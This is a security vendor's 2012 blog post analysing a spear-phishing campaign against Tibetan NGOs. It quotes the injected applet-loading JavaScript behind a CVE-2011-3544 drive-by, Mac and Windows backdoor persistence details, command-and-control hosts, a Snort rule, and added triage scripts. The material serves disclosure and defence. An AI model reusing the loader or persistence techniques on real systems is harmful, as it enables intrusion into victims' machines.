AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

March 19, 2012  |  Jaime Blasco

A few hours ago Greg Walton posted a warning about spear-phishing emails sent to non-governmental organizations related to Tibet. The content of these emails is our previous research post, "Targeted Attacks against Tibetan organizations".

—————Forwarded message—————

From: webmaster <admin@alienvault.com>

Date: Mon, Mar 19, 2012 at 8:20 AM

Subject: Targeted attacks against Tibet organizations

To: ......

We recently detected several targeted attacks against Tibetan activist organizations including the Central Tibet Administration and International Campaign for Tibet, among others.

Here is one of the emails detected:

[ More information ]

It contains a link to hxxp://dns.assyra.com/ that hosts a copy of our blog post but includes some JavaScript:

<script>
var emb = document.createElement('applet');
emb.setAttribute('name', 'applet');
emb.setAttribute('width', '1');
emb.setAttribute('height', '1');
emb.setAttribute('code', 'Func1.class');
if (navigator.userAgent.indexOf('Win') != -1){
    emb.setAttribute('archive', 'default.jar');
}
else if (navigator.userAgent.indexOf('Linux') != -1){
    emb.setAttribute('archive', 'index.jar');
}
else if (navigator.userAgent.indexOf('Mac') != -1){
    emb.setAttribute('archive', 'index.jar')
}
document.body.appendChild(emb);
</script>

The domain shenhuawg.com is also pointing to that server.

Based on the user agent (Mac or Windows), it loads a Java applet that exploits CVE-2011-3544.
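When triaging a page like this, the first thing an analyst wants is the list of artifacts the loader will fetch for each platform, so they can be blocked and retrieved for analysis. The following is an added example (not part of the original post and not AlienVault tooling) that pulls the applet attributes and the user-agent-to-archive mapping out of the injected script; the script text is embedded as a constructed sample copied from the snippet above, and the function names are this example's own.

```python
"""Extract the applet parameters and per-platform jar mapping from an injected
applet loader. Added example; the embedded script is a constructed sample taken
from the snippet quoted in the post."""
import re

# Constructed sample: the injected script as quoted in the post.
INJECTED_SCRIPT = r"""
<script>
var emb = document.createElement('applet');
emb.setAttribute('name', 'applet');
emb.setAttribute('width', '1');
emb.setAttribute('height', '1');
emb.setAttribute('code', 'Func1.class');
if (navigator.userAgent.indexOf('Win') != -1){
emb.setAttribute('archive', 'default.jar');
}
else if (navigator.userAgent.indexOf('Linux') != -1){
emb.setAttribute('archive', 'index.jar');
}
else if (navigator.userAgent.indexOf('Mac') != -1){
emb.setAttribute('archive', 'index.jar')
}
document.body.appendChild(emb);
</script>
"""

# Matches `.setAttribute('key', 'value')` with single or double quotes.
_SET_ATTR = re.compile(
    r"\.setAttribute\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)"
)
# Matches a `navigator.userAgent.indexOf('Token') != -1` branch and captures the token.
_UA_BRANCH = re.compile(
    r"navigator\.userAgent\.indexOf\(\s*['\"]([^'\"]+)['\"]\s*\)\s*!=\s*-1"
)


def extract_applet_loader(script: str) -> dict:
    """Return the static applet attributes and a platform-token -> archive mapping."""
    static = {}
    archives = {}
    current_platform = None  # platform token of the branch we are currently inside
    for line in script.splitlines():
        ua = _UA_BRANCH.search(line)
        if ua:
            current_platform = ua.group(1)
            continue
        attr = _SET_ATTR.search(line)
        if not attr:
            continue
        key, value = attr.groups()
        if key == "archive" and current_platform:
            archives[current_platform] = value
        else:
            static[key] = value
    return {"attributes": static, "archives": archives}


def is_hidden_applet(info: dict) -> bool:
    """A 1x1 applet whose jar is chosen by platform is the drive-by shape seen here."""
    attrs = info["attributes"]
    return attrs.get("width") == "1" and attrs.get("height") == "1" and bool(info["archives"])
```

The archive names come straight out of the branch the loader would take for each user agent, which is what you need to request the matching jar from the hosting server for analysis or to write a proxy block for it.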

https://www.virustotal.com/file/d4b394844e8357a15bf6e76cb15db05a8b073b026a813d11e35211bb96caad52/analysis/1332192121/

https://www.virustotal.com/file/13f596019477b51c311f19f9adc2e4f9628ad98df1a55db6c707521ed944ec90/analysis/

The attack contains malware to infect both Windows and MacOSX.

The MacOSX backdoor has 0/0 antivirus detection rate:

https://www.virustotal.com/file/143969e8eaed6269ac6c55e2a861cdde81947e7c45e5d27e939d4bbb1c9ac8cd/analysis/1332184087/

bash-3.2# nm -a file.tmp
                 U ___error
                 U ___memcpy_chk
                 U ___stack_chk_fail
                 U ___stack_chk_guard
                 U ___strcat_chk
0000000100000000 A __mh_execute_header
                 U _alarm
                 U _close
                 U _connect
                 U _creat
                 U _dup2
                 U _execl
                 U _exit
                 U _fork
                 U _gethostbyname
                 U _getpid
                 U _getpwuid
                 U _gettimeofday
                 U _getuid
                 U _ioctl
                 U _malloc
                 U _memcmp
                 U _memcpy
                 U _memset
                 U _open
                 U _openpty
                 U _putenv
                 U _rand
                 U _read
                 U _recv
                 U _select$1050
                 U _send
                 U _setsid
                 U _shutdown
                 U _signal
                 U _sleep
                 U _socket
                 U _strncpy
                 U _ttyname
                 U _waitpid
                 U _write
                 U dyld_stub_binder
0000000005614542 - 00 0000   OPT radr://5614542

bash-3.2# otool -L file.tmp
file.tmp:
	/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 125.2.10)
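The import list alone already tells a story: socket/connect/gethostbyname for the callback, fork/execl/waitpid for spawning a child, and openpty/dup2 for wiring that child's terminal to the connection. The following is an added example (not the post's or AlienVault's tooling) that parses `nm -a` output and groups imported symbols by the capability they usually indicate; the listing is embedded as a constructed sample taken from the output above, and the capability groups are this example's own choice.

```python
"""Group the undefined (imported) symbols of a Mach-O binary, as printed by `nm -a`,
into capability buckets for quick triage. Added example; the listing below is a
constructed sample copied from the post's output."""

# Constructed sample: a subset of the `nm -a file.tmp` output quoted above.
NM_OUTPUT = """\
                 U ___error
                 U ___stack_chk_fail
0000000100000000 A __mh_execute_header
                 U _alarm
                 U _connect
                 U _dup2
                 U _execl
                 U _fork
                 U _gethostbyname
                 U _openpty
                 U _recv
                 U _select$1050
                 U _send
                 U _setsid
                 U _socket
                 U _waitpid
                 U dyld_stub_binder
0000000005614542 - 00 0000   OPT radr://5614542
"""

# Symbols grouped by the capability they usually indicate (this example's own grouping).
CAPABILITIES = {
    "network_client": {"socket", "connect", "gethostbyname", "send", "recv"},
    "spawn_process": {"fork", "execl", "waitpid", "setsid"},
    "pty_redirect": {"openpty", "dup2", "ttyname"},
    "timing_watchdog": {"alarm", "signal", "sleep"},
}


def undefined_symbols(nm_text: str) -> set:
    """Return imported symbol names with the leading underscore and any `$variant`
    suffix (e.g. `_select$1050`) removed."""
    names = set()
    for line in nm_text.splitlines():
        parts = line.split()
        # Undefined symbols print as `U <name>` with no address column.
        if len(parts) == 2 and parts[0] == "U":
            name = parts[1].split("$", 1)[0]
            names.add(name[1:] if name.startswith("_") else name)
    return names


def classify(nm_text: str) -> dict:
    """Map each capability group to the imported symbols that support it."""
    imported = undefined_symbols(nm_text)
    return {
        cap: sorted(imported & syms)
        for cap, syms in CAPABILITIES.items()
        if imported & syms
    }


def looks_like_remote_shell(nm_text: str) -> bool:
    """Network client + process spawning + pty/dup2 plumbing together is the classic
    remote-shell backdoor shape; any one group on its own is not suspicious."""
    return {"network_client", "spawn_process", "pty_redirect"} <= set(classify(nm_text))
```

Feed it the output of `nm -a` on a suspect file; a hit on all three core groups in a binary that links only libSystem, as this one does, is a strong reason to escalate.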

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.docserver</string>
<key>Program</key>
<string>/Library/Audio/Plug-Ins/AudioServer</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
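The launchd job above combines an Apple-looking label with a program path that no Apple job uses. The following is an added example (not AlienVault's code) that audits a launchd property list for that combination using the standard `plistlib` module; the plist is embedded as a constructed sample copied from the one above, and the "system location" prefixes are this example's own heuristic.

```python
"""Flag launchd property lists whose label mimics Apple but whose program lives
outside the system locations. Added example; the sample plist is the one quoted
in the post, embedded as a constructed sample."""
import plistlib

# Constructed sample: the persistence plist quoted above.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.docserver</string>
<key>Program</key>
<string>/Library/Audio/Plug-Ins/AudioServer</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
"""

# Directories where Apple-labelled launchd programs legitimately live (heuristic).
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/")


def audit_launchd_plist(data: bytes) -> list:
    """Return a list of finding strings for one plist; an empty list means nothing flagged."""
    try:
        job = plistlib.loads(data)
    except Exception as exc:  # malformed plist: report rather than silently skip
        return [f"unparseable plist: {exc}"]

    findings = []
    label = str(job.get("Label", ""))
    # launchd jobs name their binary via Program or the first ProgramArguments entry.
    program = job.get("Program") or (job.get("ProgramArguments") or [""])[0]
    program = str(program).strip()

    if label.startswith("com.apple.") and not program.startswith(APPLE_PROGRAM_PREFIXES):
        findings.append(f"apple-style label {label!r} runs non-system program {program!r}")
    if "/Plug-Ins/" in program:
        findings.append(f"launchd program inside a plug-in directory: {program!r}")
    if job.get("RunAtLoad") and findings:
        findings.append("RunAtLoad is set, so the flagged program starts at boot/login")
    return findings


def audit_many(plists: dict) -> dict:
    """Audit a mapping of path -> plist bytes and keep only entries with findings."""
    results = {path: audit_launchd_plist(data) for path, data in plists.items()}
    return {path: f for path, f in results.items() if f}
```

To run this on a live system, read each file under /Library/LaunchDaemons, /Library/LaunchAgents and ~/Library/LaunchAgents into `audit_many`; anything flagged with an Apple-style label deserves a look at the referenced binary.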

The trojan connects to the following server:

dns.assyra.com (100.42.217.73)
    100.42.208.0 - 100.42.223.255
    530 W. 6th St Suite 701
    Los Angeles, CA
    US

The domain assyra.com has been involved in several attacks in the past using Win32/Protux.

The Windows payload is detected by AVG as BackDoor.Generic15.VKZ

https://www.virustotal.com/file/5513b45a4856f7941d71cf0885380469fdc22ece101d0399baabc9bd8b5536be/analysis/

The Windows payload seems to have been created 6 days ago:

It copies itself to "C:\WINDOWS\system32\2019\svchost .exe" and modifies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders -> Startup to maintain persistence.

It connects to the following servers:

tibet.zyns.com (100.42.217.73)
    100.42.208.0 - 100.42.223.255
    530 W. 6th St Suite 701
    Los Angeles, CA
    US

yahoo.xxuz.com (100.42.217.91)
    100.42.208.0 - 100.42.223.255
    530 W. 6th St Suite 701
    Los Angeles, CA
    US

lyle.changeip.org (100.42.217.73)
    100.42.208.0 - 100.42.223.255
    530 W. 6th St Suite 701
    Los Angeles, CA
    US

Once it connects to one of the servers (port 8080), it sends some information about the victim, such as the ComputerName, using some obfuscation:

You can use the following rule to catch this traffic on your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET 8080 (msg:"MALWARE WUpdater checkin"; content:"|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|"; depth:33; classtype:trojan-activity; sid:11111111111111; rev:1;)
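If you want to validate the rule against captured traffic, or hunt through stored payloads without an IDS, the `content` and `depth` semantics are easy to reproduce. The following is an added example (not part of the original post and not a Snort component) that decodes the rule's `|hex|` content notation into bytes and applies the `depth:33` window to sample payloads; the three payloads are constructed for the example, and the rule content string is the one from the rule above.

```python
"""Apply a Snort `content`/`depth` match to raw payloads. Added example; the content
string is the one from the rule above, and the sample beacons are constructed."""

RULE_CONTENT = "|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|"
RULE_DEPTH = 33


def snort_content_to_bytes(content: str) -> bytes:
    """Translate Snort content syntax into raw bytes: text outside pipes is literal,
    text inside a |...| pair is space-separated hex."""
    out = bytearray()
    for i, segment in enumerate(content.split("|")):
        if i % 2 == 1:  # odd segments sit between a pair of pipes -> hex bytes
            out += bytes.fromhex(segment.replace(" ", ""))
        else:
            out += segment.encode("latin-1")
    return bytes(out)


def matches_checkin(payload: bytes, content: str = RULE_CONTENT, depth: int = RULE_DEPTH) -> bool:
    """`depth:N` restricts the content search to the first N bytes of the payload."""
    needle = snort_content_to_bytes(content)
    return needle in payload[:depth]


# Constructed sample payloads: a beacon the rule should catch, one where the same
# marker appears beyond the depth window, and an unrelated HTML response.
SAMPLE_PAYLOADS = {
    "checkin": b"<html><title>12356</title><body>" + b"\x00" * 16,
    "too_deep": b"HTTP/1.1 200 OK\r\n\r\n<html><title>12356</title><body>",
    "benign": b"<html><title>Welcome</title><body>hello</body></html>",
}


def scan(payloads: dict) -> list:
    """Return the names of payloads the rule would alert on."""
    return [name for name, data in payloads.items() if matches_checkin(data)]
```

The "too_deep" case shows why `depth` matters: the marker is there, but not within the first 33 bytes, so the rule as written would not fire on it. If the check-in can be preceded by an HTTP header in your environment, the rule needs a larger depth or a different anchor.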

We will publish more information about this and ongoing attacks as soon as we have more information. Stay tuned.

Update: There is another sample of BackDoor.Generic15.VKZ (222a150bf0399f23af6d59f695304610) which used 11.36.214.140 as the C&C server. Check your logs!
